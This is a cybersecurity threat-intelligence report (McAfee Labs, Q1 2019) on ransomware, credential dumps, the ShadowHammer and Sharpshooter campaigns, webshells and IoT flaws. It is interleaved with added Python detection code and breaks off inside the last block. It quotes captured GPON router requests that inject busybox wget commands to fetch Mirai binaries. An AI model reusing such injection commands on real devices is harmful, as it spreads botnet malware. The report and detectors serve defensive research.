McAfee Labs Threats Report August 2019


KEY CAMPAIGNS
New Ransomware Techniques Discovered
High-Profile Data Dumps Expose Billions of Accounts
Attackers Target More Lucrative Returns from Larger Enterprises

Ransomware attacks grew by 118%, new ransomware families were detected, and threat actors used innovative techniques.

This report was researched and written by: Christiaan Beek, Taylor Dunton, John Fokker, Steve Grobman, Tim Hux, Tim Polzer, Marc Rivero Lopez, Thomas Roccia, Jessica Saavedra-Morales, Raj Samani, Ryan Sherstobitoff

Introduction

Welcome to the McAfee Labs Threats Report, August 2019. In this edition, we highlight the significant investigative research and trends in threats statistics and observations in the evolving threat landscape gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of 2019.

In the first quarter of 2019, ransomware attacks grew by 118%, new ransomware families were detected, and threat actors used innovative techniques. In January, the McAfee Advanced Threat Research team was the first to discover a new ransomware family, Anatova, designed to cipher all files before requesting payment from the victim. Anatova’s architecture is unusual in that it is modular, which could facilitate future development of ransomware.

A hacker using the moniker “Gnosticplayers” reportedly released data from large companies in Q1, which McAfee researchers have dubbed “the quarter of data dumps.” We also observed a significant amount of HTTP web exploitation traffic and attempts to compromise remote machines. A notable 460% rise in the use of PowerShell as the tool of choice in targeted attacks of compromised servers was also detected. Most ransomware attackers no longer use mass campaigns, but, instead, try to get remote access, where remote desktop protocol is the most used entry vector.

Also, in Q1, new cryptojacking families—including malware targeting Apple users—were discovered amidst campaigns designed to steal wallets and credentials, along with a massive cryptomining campaign designed to exploit a remote command execution vulnerability in ThinkPHP. Criminals continue to attack Internet of Things (IoT) devices with default username/password combinations that are used in popular IP cameras, DVRs, and routers. McAfee researchers also uncovered two new vulnerabilities within connected devices that allow hackers access to the personal lives of consumers via vulnerabilities in smart locks and Wemo-equipped coffee makers.

McAfee also revealed evidence that the Operation Sharpshooter campaign was more complex and extensive in scope and duration of operations.

“Even with all the sophisticated attack techniques being developed, attackers are still highly dependent on human interaction and social engineering.”
—Raj Samani, Chief Scientist and McAfee Fellow

We hope you find the Q1 2019 Threats Report enlightening and valuable to your continued campaign to thwart enemy attacks and secure your data and assets.

—Raj Samani, Chief Scientist and McAfee Fellow, Twitter @Raj_Samani
—Christiaan Beek, Lead Scientist, Twitter @ChristiaanBeek

Table of Contents

5   New Ransomware Techniques Discovered
7   High-Profile Data Dumps Expose Billions of Accounts
10  Attackers Target More Lucrative Returns from Larger Enterprises
12  Supply Chain Attacks
18  Significant HTTP Web Exploitation Targeting Companies, Rise of Webshells
22  New Cryptojacking Families, Campaigns Detected
23  Flaws, Defects in Microsoft Windows, Microsoft Office, ThinkPHP, Apple iOS
29  New Exploit Kit Discovered, Fallout, Fiesta Active
30  Continued Attacks on Popular IoT Personal Electronics, Appliances
34  Threats Statistics

New Ransomware Techniques Discovered

The 118% increase in ransomware attacks included the discovery of new ransomware families utilizing new, innovative techniques to target and infect enterprises. McAfee researchers observed cybercriminals are still using spear-phishing tactics, but an increasing number of attacks are gaining access to a company that has open and exposed remote access points, such as RDP and virtual network computing (VNC). RDP credentials can be brute-forced, obtained from password leaks, or simply bought in underground markets. Where past ransomware criminals would set up a command and control environment for the ransomware and decryption keys, most criminals now approach victims with ransom notes that include an anonymous email service address, allowing bad actors to remain better hidden.

New ransomware families include Anatova

The McAfee Advanced Threat Research team discovered one of the new ransomware families, Anatova, before it could become a bigger threat.¹ Anatova, based on the name of the ransom note, was detected in a private peer-to-peer (p2p) network. Anatova usually uses the icon of a game or application to trick the user into downloading it. The ransomware can adapt quickly, using evasion tactics and spreading mechanisms. Anatova has a manifest to request administrative rights and strong protection techniques against static analysis, which makes things tricky. Its modular design allows it to add new, embedded functionalities designed to thwart anti-ransomware methods. Data cannot be restored without payment, and a generic decryption tool cannot be created with today’s technology. Our analysis indicates that Anatova has been written by skilled software developers.

Top three ransomware families

Despite a decline in volume and unique ransomware families in Q4 of 2018, the first quarter of 2019 saw the detection of several new ransomware families using innovative techniques to target businesses. The top three ransomware families (based on volume) that were most active in Q1 are:

Dharma: This ransomware appends various extensions to infected files and is a variant of CrySiS. The malware has been in operation since 2016, and the threat actors behind the ransomware continue to release new variants, which are not decryptable.

GandCrab: This ransomware uses AES encryption and drops a file labeled “GandCrab.exe” on the infected system. The malicious software adds “.GDCB” to encrypted files and is known to be delivered to unsuspecting victims using the RIG exploit kit.

Ryuk: Early in Q1, an outbreak of Ryuk ransomware impeded newspaper printing services in the United States. McAfee investigated the incident and studied its inner workings, including technical indicators, cybercriminal traits, and evidence discovered on the dark web.² McAfee hypothesized that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the characteristics of a cybercrime operation. McAfee published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, collective industry peers discovered additional technical details of Ryuk.

Figure 1. Active ransomware families of Q1 2019. (Word-cloud graphic of family names; not reproduced.)

It should be noted that GandCrab and Ryuk are using mostly spear-phishing as a distribution mechanism, whereas Dharma is used in RDP attacks.

New variants of another persistent family, Scarab, also have been discovered on a continued basis in 2019. In Q1, various new samples were detected, appending a range of extensions to infected files such as .zzzzzzzz, .crash, .GEFEST, .AERTEMY, .kitty, .aescrypt, .crabs, .Joke, .nosafe, .tokog, and .suffer. Some variants accept Bitcoin, as well as DASH, for payment.

No More Ransom’s GandCrab decryptor

The GandCrab ransomware, which appeared early in 2018 and was addressed by McAfee gateway and endpoint products, resumed activity after release of an initial decryptor. The No More Ransom collective against ransomware countered with a decryptor that unlocks files up to GandCrab version 5.1, but GandCrab quickly followed with a new version 5.2. Europol announced in Q1 that the new decryptor allowed more than 14,000 people to save their encrypted files.³ McAfee is proud to work alongside law enforcement and security agencies as part of the continuing No More Ransom initiative.

High-Profile Data Dumps Expose Billions of Accounts

Collection breaches dump more than two billion accounts

The first quarter of 2019 can easily be dubbed “the quarter of data dumps.” Collection #1 first appeared on the popular MEGA cloud service.⁴ The Collection #1 folder held more than 12,000 files and more than 87 gigabytes. Its data set appeared to be designed to target credential-stuffing attacks to leverage email and password combinations to hack into consumers’ online accounts. Collection #1’s data set exposed more than 770,000 unique email addresses and more than 21 million unique passwords. When the storage site was taken down, the folder filled with passwords was then transferred to a public hacking site, where it was not for sale but was made available for anyone to take. The large volume of files made Collection #1 the second largest breach after Yahoo’s and the largest public breach in history. The discovery of Collection #2–5 just weeks later pushed the campaign’s total amount of stolen accounts to more than 2.2 billion.

Gnosticplayers releases nearly 1 billion accounts

Hacker Gnosticplayers gained media attention, offering several rounds of releases and nearly one billion fresh account records for sale on the dark web’s Dream Market. The release included data from several large companies.

The massive number of stolen credentials provides ideal ammunition for credential-stuffing attacks, in which criminals attempt to take over user accounts by automatically injecting the stolen credentials into a website until they gain access to an existing account.

Figure 2. Gnosticplayers Dream Market advertisement. (Legible listing entries: Coubic.com [1.5 million]; lifebear.com [Japan]; Youthmanual.com; Bukalapak, 13 million [Alexa top 200]; each offered in escrow.)

Law enforcement shuts down RDP shop xDedic

In January, the FBI teamed with Belgian police and other law enforcement agencies to take down xDedic, a large RDP shop online platform selling remote desktop protocol access to hacked machines and logins, leaving major companies potentially vulnerable to data theft and ransomware. In 2016, it was reported that xDedic was selling access to about 70,000 hacked machines. In 2018, McAfee research into the RDP shop eco-climate determined that xDedic was still one of the top five most prolific RDP shops and a popular source for criminals intent on committing credit card fraud, cryptomining, ransomware, and account fraud. McAfee recently highlighted steps an organization can take to better secure RDP.

Figure 3. Takedown notice on the xDedic website.
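The credential-stuffing pattern described above is visible on the server side as one client trying many distinct accounts with a high failure rate. The following is an added example, not code from the McAfee report, that scores each source IP over a sliding time window on exactly those two features and lists any account that did open (the ones an incident responder should reset first). The log line format, window length and thresholds are assumptions chosen for the example, and the log lines are constructed.

```python
"""Flag credential-stuffing sources in web login logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO-8601 timestamp> <client ip> login <username> <success|failure>"
LINE_RE = re.compile(r"^(\S+) (\S+) login (\S+) (success|failure)$")

# Constructed sample lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
# 203.0.113.7 sprays eight accounts within seconds and gets into one;
# 198.51.100.20 is a real user mistyping a password twice.
SAMPLE_LOG = """\
2019-03-01T10:00:01 203.0.113.7 login alice@example.com failure
2019-03-01T10:00:02 203.0.113.7 login bob@example.com failure
2019-03-01T10:00:03 203.0.113.7 login carol@example.com success
2019-03-01T10:00:04 203.0.113.7 login dan@example.com failure
2019-03-01T10:00:05 203.0.113.7 login erin@example.com failure
2019-03-01T10:00:06 203.0.113.7 login frank@example.com failure
2019-03-01T10:00:07 203.0.113.7 login grace@example.com failure
2019-03-01T10:00:08 203.0.113.7 login heidi@example.com failure
2019-03-01T10:00:09 198.51.100.20 login dave@example.com failure
2019-03-01T10:00:20 198.51.100.20 login dave@example.com failure
2019-03-01T10:00:35 198.51.100.20 login dave@example.com success
"""


def parse_log(text):
    """Turn log text into (timestamp, ip, user, succeeded) tuples; unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, ip, user, outcome = m.groups()
            events.append((datetime.fromisoformat(ts), ip, user, outcome == "success"))
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=10),
                               min_users=5, min_failure_ratio=0.8):
    """Return {ip: summary} for sources whose activity inside some window shows
    at least `min_users` distinct usernames and a failure ratio of at least
    `min_failure_ratio`. The summary covers the largest window that tripped."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)

    alerts = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward so the window spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e[2] for e in win}
            failures = sum(1 for e in win if not e[3])
            ratio = failures / len(win)
            if len(users) >= min_users and ratio >= min_failure_ratio:
                summary = {
                    "attempts": len(win),
                    "distinct_users": len(users),
                    "failure_ratio": round(ratio, 2),
                    # Accounts that opened during the spray: treat as compromised.
                    "successful_logins": sorted(e[2] for e in win if e[3]),
                }
                if ip not in alerts or summary["attempts"] > alerts[ip]["attempts"]:
                    alerts[ip] = summary
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, summary)
```

The distinct-username count is what separates stuffing from an ordinary brute force against one account or a user who has forgotten a password, so the threshold on it matters more than the failure ratio; on a site where many users share one NAT address the window should be narrowed or the source key extended with a client fingerprint.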

Dream Market shut down

In March, the largest underground dark market, Dream Market, announced its shutdown and transfer to a partner market. Dream Market administrators pointed to a large amount of distributed denial-of-service (DDoS) attacks they had to endure, but other sources suggested the shutdown was tied to the 62 worldwide arrests of dark market vendors announced by international law enforcement agencies.⁵

Attackers Target More Lucrative Returns from Larger Enterprises

Campaigns using data leakage, brute-force password spraying, automation

In the first quarter of 2019, the industry saw a rise in targeted attacks against larger organizations. These attacks, including the initial scraping of data, or reconnaissance, have been done through leakage or brute-force password spraying and a good amount of automation. Using these techniques, threat actors are required to invest little effort in pursuit of larger returns, depending on the organization and personally identifiable information (PII) exfiltrated.

ID     Tactic               Technique                          Percentage of tracked campaigns using this technique
T1193  Initial Access       Spear-phishing attachment          68
T1204  Execution            User Execution                     77
T1086  Execution            PowerShell                         45
T1027  Defense Evasion      Obfuscated Files or Information    50
T1020  Exfiltration         Automated Exfiltration             77
T1041  Exfiltration         Exfiltration on C2 channels        72
T1043  Command and Control  Commonly used ports                72
T1071  Command and Control  Standard application layer protocols  72

More than 36 publicly known targeted attacks were observed, with threat actors focusing more on larger organizations that have been surveyed to produce a more lucrative return. The McAfee Advanced Threat Research team gathered technical details and techniques through research of more than 22 targeted attack campaigns. Analysis of these details shows threat actors are going after bigger fish, and they continue to use user execution and spear-phishing attachments in attacks.

McAfee Advanced Threat Research has been monitoring the global DNS hijacking campaign targeting telecommunications, internet infrastructure providers, and government entities in the Middle East, Europe, and North America.⁶ Though DNS poisoning usually occurs locally on the victim’s machine or router, this attack compromised DNS settings at a much higher level—beyond the end user’s control. Below is a depiction of a DNS A Record altering:

(Diagram labels: Attacker → Proxy → DNS Provider: change A record; redirect to a malicious site; Target. The victim accesses their mail server and is unknowingly redirected to a malicious system before landing on their legitimate mail server; the victim is typically unaware and might only notice a slight delay. Malicious system with a proxy pass-through; load balancer; malicious cert created for the legitimate mail server; username, password, and domain credentials are harvested and stored; victim mail server.)
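From the defender's side, the chain in the diagram above changes two observable things: the address the mail server's name resolves to, and the certificate the service presents. Because the A record is altered at the provider, every resolver returns the same wrong answer, whereas local poisoning of the kind the report contrasts it with shows up on one resolver only. The following added example, not code from the McAfee report, encodes those observations as a baseline check; the baseline values, resolver labels and certificate fingerprints are constructed placeholders, and in practice the observations come from resolver queries and TLS handshakes.

```python
"""Compare DNS answers and presented certificates against an approved baseline (added example)."""
import ipaddress

# Approved state per monitored name. 192.0.2.0/24 is a documentation range; fingerprints are placeholders.
BASELINE = {
    "mail.example.com": {
        "a_records": {"192.0.2.10", "192.0.2.11"},
        "allowed_networks": ["192.0.2.0/24"],
        "cert_sha256": "sha256:PLACEHOLDER-LEGIT-FINGERPRINT",
    },
}


def check_name(name, answers_by_resolver, presented_cert_sha256, baseline=BASELINE):
    """Return (severity, code, detail) findings for one monitored name.

    answers_by_resolver: {resolver_label: set_of_ip_strings} from several independent resolvers.
    presented_cert_sha256: fingerprint of the certificate the service presented by that name.
    """
    base = baseline[name]
    nets = [ipaddress.ip_network(n) for n in base["allowed_networks"]]
    findings = []

    # Which resolvers returned an address outside the approved set?
    bad = {}
    for resolver, ips in answers_by_resolver.items():
        unexpected = set(ips) - base["a_records"]
        if unexpected:
            bad[resolver] = unexpected
    if bad:
        # Unanimous wrong answers point at the zone itself (provider/registrar level);
        # one disagreeing resolver points at local or resolver-level poisoning.
        scope = "upstream_zone_change" if len(bad) == len(answers_by_resolver) else "single_resolver_poisoning"
        for resolver, ips in bad.items():
            for ip in sorted(ips):
                in_own_net = any(ipaddress.ip_address(ip) in n for n in nets)
                severity = "medium" if in_own_net else "high"
                findings.append((severity, "A_RECORD_UNEXPECTED",
                                 f"{resolver} returned {ip} for {name} ({scope})"))

    if presented_cert_sha256 != base["cert_sha256"]:
        findings.append(("high", "CERT_CHANGED", f"{name} presented {presented_cert_sha256}"))

    # The diagram's full chain: redirected address and a new certificate seen together.
    codes = {f[1] for f in findings}
    if {"A_RECORD_UNEXPECTED", "CERT_CHANGED"} <= codes:
        findings.append(("critical", "POSSIBLE_DNS_HIJACK_PROXY",
                         f"{name}: redirected address and new certificate observed together"))
    return findings


# Constructed observations: a hijack as in the diagram, and a clean baseline match.
HIJACKED = {
    "answers": {"resolver-a": {"203.0.113.50"}, "resolver-b": {"203.0.113.50"}},
    "cert": "sha256:PLACEHOLDER-ATTACKER-FINGERPRINT",
}
CLEAN = {
    "answers": {"resolver-a": {"192.0.2.10"}, "resolver-b": {"192.0.2.11"}},
    "cert": "sha256:PLACEHOLDER-LEGIT-FINGERPRINT",
}

if __name__ == "__main__":
    for label, obs in (("hijacked", HIJACKED), ("clean", CLEAN)):
        print(label, check_name("mail.example.com", obs["answers"], obs["cert"]))
```

Pinning the certificate fingerprint rather than only checking that the chain validates is deliberate: in the diagram the attacker's certificate for the legitimate name is issued by a public CA and validates cleanly, so only a comparison against the known-good fingerprint (or Certificate Transparency monitoring) catches it.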

Supply Chain Attacks

Lazarus Group

In February, it was reported the Lazarus Group lured Russian-based organizations with a StarForce Technologies NDA agreement, tricking victims into opening the document riddled with macros, and camouflaged its cabinet (CAB) files as JPEGs to lower the detection rate. Within the same month, we also became privy to another cyberespionage campaign targeting national security think tanks and academic institutions in the U.S.⁷ The Lazarus Group allegedly has also launched another operation targeting the cryptocurrency space with FallChill. Connections between the Lazarus Group’s malware galaxy can be found here.

Operation ShadowHammer

The frequency of supply chain attacks seems to be on the rise. The supply chain attacks use backdoored software versions executed on the victim’s computer, with the update allowing attacker access. The first quarter of 2019 saw the announcement that a major PC manufacturer’s software-update mechanism was compromised and contained malware. The supply chain attack, Operation ShadowHammer, took place in late 2018, and targeted an unknown pool of users identified by their network adapters’ MAC addresses. The backdoored executable was signed with the vendor’s certificate. This might indicate that the adversaries had control over the update mechanism and could insert their “version” of the updated software.

(Diagram labels: software supplier; Trojanized software.)

The malware contained the functionality to determine if the infected system was in the adversaries’ interest. The malware used an algorithm to scan for the Media Access Control (MAC) address of the victim’s network interface and hashed it to an MD5 value:

Figure 4. Routine that checks the MAC address and creates the MD5.

The fact that the malware contains a check that looks for a VMware virtual adapter first, followed by a MAC address on the same machine with a different value, is an indicator that the adversaries knew precisely what to go after. With information on their exact targets, they had carefully planned the operation to infiltrate their victims by using a software update mechanism of a supplier.

Operation SharpShooter

In Q4 of 2018, the McAfee Advanced Threat Research team discovered a new global campaign targeting nuclear, defense, energy, and financial companies. Tagged Operation SharpShooter, this ongoing campaign leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation.

In Q1 of 2019, McAfee conducted a detailed analysis of code and data from a command-and-control server responsible for the management of the operations, tools, and tradecraft behind this global cyberespionage campaign. This content was provided to McAfee for analysis by a government entity that is familiar with McAfee published research on this malware campaign. The analysis led to identification of multiple, previously unknown command-and-control servers and suggests that Operation Sharpshooter began as early as September 2017, targeting a broad set of organizations in more industries and countries. The McAfee Advanced Threat Research team’s analysis into the Rising Sun implants shows code overlap from malware dating to 2016 to Operation Sharpshooter. The command and control server data reveals some fascinating findings about how the server was controlled and other interesting conclusions:

Key findings

- There are multiple versions of the Rising Sun implant that have been used in attacks since at least 2016. The attackers have used backdoor Duuzer source code as a basis for their implants since early 2016.
- The attackers have been using a command and control infrastructure with the core backend written in PHP and ASP. The code appears to be custom and unique to the group, and our analysis reveals that it has been part of its operations since 2017.
- The analysis of the command and control code confirms that in earlier attacks, the Rising Sun implant was using some of the same code and data as used in Operation Sharpshooter.
- Operation Sharpshooter utilizes the same command and control code running on the servers as Rising Sun. The Operation Sharpshooter sample code and data from January 2018 included seven different command and control servers running the same command interpreter code found in Rising Sun.
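The ShadowHammer MAC-address check described above has a defender-side use: the same computation, run against a list of published target hashes, answers the incident-response question of whether a given host was on the attacker's list. The following is an added example, not code from the McAfee report. The target list is constructed from placeholder MACs, and the exact text form of the MAC that the real malware hashed is an assumption here, so several common encodings are tried; the VMware OUI prefixes are real assignments used only to mirror the "virtual adapter first" ordering the report describes.

```python
"""Check a host's adapters against a list of MD5(MAC) target hashes (added example)."""
import hashlib
import uuid

# Constructed placeholders standing in for hashes published by researchers.
EXAMPLE_TARGET_MACS = ["00:0C:29:12:34:56", "3C:97:0E:AB:CD:EF"]
TARGET_HASHES = {hashlib.md5(m.encode()).hexdigest() for m in EXAMPLE_TARGET_MACS}

# OUIs assigned to VMware; used to check virtual adapters first, as the report says the malware did.
VMWARE_OUIS = {"00:0C:29", "00:50:56", "00:05:69", "00:1C:14"}


def normalize(mac):
    """Return the MAC as upper-case, colon-separated hex pairs, whatever separator it came with."""
    hexdigits = "".join(c for c in mac.upper() if c in "0123456789ABCDEF")
    if len(hexdigits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def is_vmware(mac):
    return normalize(mac)[:8] in VMWARE_OUIS


def md5_candidates(mac):
    """Map MD5 digest -> encoding tried. Several encodings because the hashed form is an assumption."""
    n = normalize(mac)
    forms = [n, n.lower(), n.replace(":", ""), n.replace(":", "").lower(),
             n.replace(":", "-"), n.replace(":", "-").lower()]
    out = {hashlib.md5(f.encode()).hexdigest(): f for f in forms}
    out[hashlib.md5(bytes.fromhex(n.replace(":", ""))).hexdigest()] = "raw-bytes"
    return out


def find_targeted(macs, target_hashes=TARGET_HASHES):
    """Return [(mac, encoding, digest)] for adapters whose hash is on the list,
    VMware adapters first, then the remaining adapters in address order."""
    ordered = sorted(macs, key=lambda m: (not is_vmware(m), normalize(m)))
    hits = []
    for mac in ordered:
        for digest, form in md5_candidates(mac).items():
            if digest in target_hashes:
                hits.append((normalize(mac), form, digest))
                break
    return hits


def local_macs():
    """Best-effort list of this host's MACs using only the standard library."""
    node = uuid.getnode()
    if (node >> 40) & 1:  # multicast bit set: uuid.getnode() fell back to a random value
        return []
    return [normalize(f"{node:012X}")]


if __name__ == "__main__":
    print(find_targeted(local_macs()) or "no local adapter on the target list")
```

`uuid.getnode()` returns only one adapter; for a real sweep, feed `find_targeted` the full adapter list from `ip link` or `Get-NetAdapter`, since the report notes the malware compared a second, non-virtual adapter as well.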

The content, provided to us by a government entity, has provided insights into the Sharpshooter command and control and reveals how the actor’s backend operations work. The command and control server is used, for example, to monitor the incoming traffic from victims that were infected with the Rising Sun implants. The exposure of this command and control code enables us to better understand how they manage their operations, tools, and tradecraft. This command and control data has provided the McAfee Advanced Threat Research team with the ability to detect more samples that otherwise would have remained unknown, unless we had analyzed the contents of dozens of packet captures that exhibited identical behavior.

Figure 5. Component interaction in attacker’s framework. (Diagram labels: Threat Actor connects via Express VPN to the Primary C2, 23.227.207.185, running TinyProxy 1.8.4, with direct access to the server; command relay to an Intermediate C2, a hacked server, through the Notice.php webshell; server web directory holding Mainmenu.php (command interpreter), Framework.php and Vendor.php (implant downloaders), Apple.php, and an encrypted EXE; a maldoc downloads the downloader Mypng.png, which downloads and decrypts Rising Sun v2, which in turn gets commands/seed data from the C2.)

The investigation of the command and control code helped us identify not only more servers, but also enabled us to locate variations of Rising Sun going back to 2016. The McAfee Advanced Threat Research team analyzed the additional Rising Sun samples and determined that there are multiple versions, all of which included the core Duuzer bot capabilities.⁸ We also see a clear evolutionary path from the Duuzer implant to what we see now as Rising Sun, version 2, which is the latest iteration of the implant framework. This implant takes on various forms dating back to the time that Backdoor Duuzer was originally revealed in Operation Blockbuster. The Blockbuster report was a coalition of private industry partners joined together to identify, understand, and aid the industry in exposing the Lazarus Group.

The attackers operating this family of implants (Rising Sun) have used some key operational and engineering practices to successfully infect their targets and thwart detection mechanisms:

- The bot capabilities across all variants of Rising Sun are the same. There have been minimal changes in these functionalities, with only a couple of new bot capabilities added to new variants (example: “Create Process as user” in Rising Sun v2.0). The attackers have aimed to preserve the core bot capabilities of the implant family (derived from Trojan Duuzer), while modifying peripheral functionalities to support infection, deployment, and communication.
- There are multiple mechanisms used to deliver and deploy the implants to the target endpoints. Examples of these are the malicious documents (maldocs), downloaders/droppers, and injectors that can finally deploy the RS implants in the form of either standalone .exes, service DLLs, or DLLs that are directly injected into the memory of a benign process.
- The communications mechanisms have also seen variations ranging from different HTTP communication schemes to the use of SSL-based communication.

It is therefore highly likely that the implant family consists of the following key components stitched together to engineer the final implant payloads:

- Configuration Acquiring Modules—ranging from independent files to embedded resources
- Configuration Decryption Module—RC4 based
- Core BOT Capabilities Module—same as Trojan Duuzer
- CnC Communication Modules—multiple HTTP modules and SSL modules

The Evolution of Rising Sun Implant

Similarities across versions

BOT capabilities: execute commands; get drive information; launch process from Windows binary; get processes information; terminate process; get file times; read a file; write a file to disk; delete file; get additional file information; connect to an IP address; change file attributes; variant of change file attributes.
API resolution techniques: API resolution in code.
Data configuration: C2 configuration information contains URLs and IP addresses of the CnC servers; local configuration data contains privilege names, VM-related strings, Registry keys, etc.

Differences by version

V1.0
  C2 configuration location: hardcoded configuration data blobs in the implant itself.
  Communication mechanism: HTTP POST requests with optional HTTP data in a specific format.
  Deployment technique: distributed via malicious document that injects shellcode into the Word process.

V1.1
  C2 configuration location: uses a file on disk in the currently logged-in user’s profile folder to read the C2 configuration data from.
  Communication mechanism: different set of HTTP headers to transmit the data to its CnC.
  Deployment technique: distribution techniques currently unknown.

V1.2
  C2 configuration location: embedded resources in the binary containing the RC4-encrypted CnC data.
  Communication mechanism: uses SSL to connect to its C2 IP addresses with hardcoded certificates.
  Deployment technique: distributed via downloader binaries.

Significant HTTP Web Exploitation Targeting Companies, Rise of Webshells

During Q1, monitoring by the McAfee Advanced Threat Research team detected network attack trends and attempted exploitation of remote assets. Our data is used to determine prominent and unique attack vectors being utilized by various actors and cybercriminal groups. The data represents the current threat landscape as it relates to network-based threats targeting companies and individuals around the globe. It also shows where these attacks are originating from and what specific countries are at most risk from these threats before the community at large is aware.

We tracked distinct global locations that host multiple types of malicious activity, such as botnet command and control infrastructure, malware hosting, and advanced persistent threat (APT) infrastructure. The data included legitimate systems that have been compromised and repurposed during attacks. Many of these hosting locations were quickly brought up for the attack and then taken down hours later.

Figure 6. Global locations that host (likely compromised) malicious activity on all protocols.

Our analysis includes the tracking of malicious locations that are identified as TOR relays or exit nodes that are used in network-based attacks.

Figure 7. Global locations of traffic sources with malicious reputation.

Further network-based exploitation is still widely used by actors in addition to the classical spear-phishing and email-based threats. Some of these examples include the delivery of various malware over numerous network protocols using a variety of network exploits to act upon their objectives.

Top attacks over SMB protocol

- NETBIOS SMB-DS IPC Share Access
- NETBIOS SMB-DS Session Setup NTLMSSP Unicode asn1 overflow

Top attacks over HTTP protocol

- Apache Tomcat JSP upload bypass (JSP webshell installation): attackers coming from Chinese infrastructure are attempting to upload a JSP (Java Server Pages)-based webshell to remote targets. (See section Rise of Webshells.)
- Apache Struts RCE Jakarta Multipart parser
- Apache Struts OGNL Expression Injection
- Microsoft IIS Remote Code Execution
- Microsoft IIS 6.0 BO RCE
- Suspicious CHMOD in URI
- Joomla RCE (JDatabaseDriverMysqli)
- Joomla RCE M2 (Serialized PHP in UA)

Figure 8. Global traffic locations of malicious activity coming from the TOR network.

Figure 9. Global map of originating attackers.

Brute-force logins over RDP

During the course of Q1, we observed significant attacks involving brute forcing of credentials over the RDP protocol for Microsoft Windows-based systems. This analysis shows just some of the top locations from which we see brute-force traffic originating, targeting the Microsoft Windows platform.

Web attacks

In Q1, the McAfee Advanced Threat Research team observed a significant 460% increase in new PowerShell attacks, alongside a large amount of HTTP web exploitation traffic attempting to compromise remote machines. This traffic is often attributed to attacks designed to convert legitimate assets into command and control servers, malware distribution hosts, and establishment of botnet clients. This web exploitation traffic consists of malware delivery, webshell delivery, and other malicious activity seen over the HTTP protocol.

Figure 10. Global HTTP exploit traffic for a 30-day period.

Server Message Block (SMB)

Server Message Block (SMB) threats, such as WannaCry, continue to impact systems around the globe. In a 30-day period during Q1, the McAfee Advanced Threat Research team observed more than 4 million unique sources of SMB exploit traffic destined for targets around the world. SMB poses a risk for less well-configured systems running legacy applications that are unable to be completely patched. Significant traffic originating on the SMB protocol has been detected targeting various machines in an attempt to exploit them and gain access.

Figure 11. Global SMB exploit traffic for a 30-day period.

Rise of webshells

Webshells were a growing tool of choice in targeted attacks during Q1, especially in maintaining access to compromised servers. Webshells provide the attacker with backdoor access to remote targets, often delivered through a variety of exploits. We observed several interesting patterns of webshell installation on remote targets originating from various global points.

Webshell downloaders

Various types of webshells are being installed on remote targets, designed to download and install malware on those targets. One webshell example is a Remote Code Execution vulnerability, documented as CVE-2019-10562 and CVE-2018-10561. It enables code to be executed on the GPON home router platform. We also observed attacks that included WGET commands that contacted remote sites to download variants of the Mirai botnet.

Captured GPON diagnostic requests (download hosts elided):
XWebPageName diag&diag action ping&wan conlist 0&dest host ’/bin/busybox wget http:///lib/tmp.mips -O t
XWebPageName diag&diag action ping&wan conlist 0&dest host ’/bin/busybox wget http:///shiin
XWebPageName diag&diag action ping&wan conlist 0&dest host ;wget http:///bins/t

McAfee observed a new webshell example, FxCodeShell.JSP, appearing predominantly in Europe and Asia. Typically, we have seen webshells that are written in ASP or PHP languages, characteristically used by various nation-state and non-nation-state actors. This Java-based webshell is designed to download remote files and execute them on the remote target host, specifically Linux-based operating systems. This indicates that the target systems run technologies on Linux, such as web and email services, and establish command and control servers to maintain persistence. FxCodeShell has been seen originating from Chinese infrastructure and targeting countries in Asia and Europe.
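In the captured GPON requests above, the ping target field carries a shell command that fetches a Mirai variant with busybox wget, whereas a legitimate value for that field is a hostname or IP address. The following added example, not code from the McAfee report, is the corresponding detection rule: it parses the form body, flags any ping target that is not a plain host, and names the fetch tool and download URL when present. The parameter names follow the report's captures with the `=` and `_` separators that extraction dropped restored (an assumption), and the sample requests are constructed with placeholder hosts.

```python
"""Flag command injection in GPON router diagnostic requests (added example)."""
import ipaddress
import re
from urllib.parse import unquote_plus

HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                         r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
SHELL_META = set(";|&`$(){}<>'\"\n\r")
FETCH_TOOL_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def parse_form(body):
    """Split an application/x-www-form-urlencoded body into {key: [values]}.
    Written out rather than using parse_qs so ';' inside a value is never treated as a separator."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_plain_host(value):
    """True when the value is an IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def inspect_request(body):
    """Return None for a benign diagnostic request, else a dict describing the injection."""
    params = parse_form(body)
    if params.get("XWebPageName") != ["diag"]:
        return None  # only the diagnostic page exposes the ping target
    for dest in params.get("dest_host", []):
        if not dest.strip() or is_plain_host(dest):
            continue
        fetch = FETCH_TOOL_RE.search(dest)
        url = URL_RE.search(dest)
        return {
            "rule": "gpon_diag_dest_host_injection",
            "dest_host": dest,
            "shell_metachars": sorted(c for c in SHELL_META if c in dest),
            "fetch_tool": fetch.group(1).lower() if fetch else None,
            "download_url": url.group(0) if url else None,
        }
    return None


# Constructed request bodies in the shape of the report's captures; 203.0.113.5 is a documentation address.
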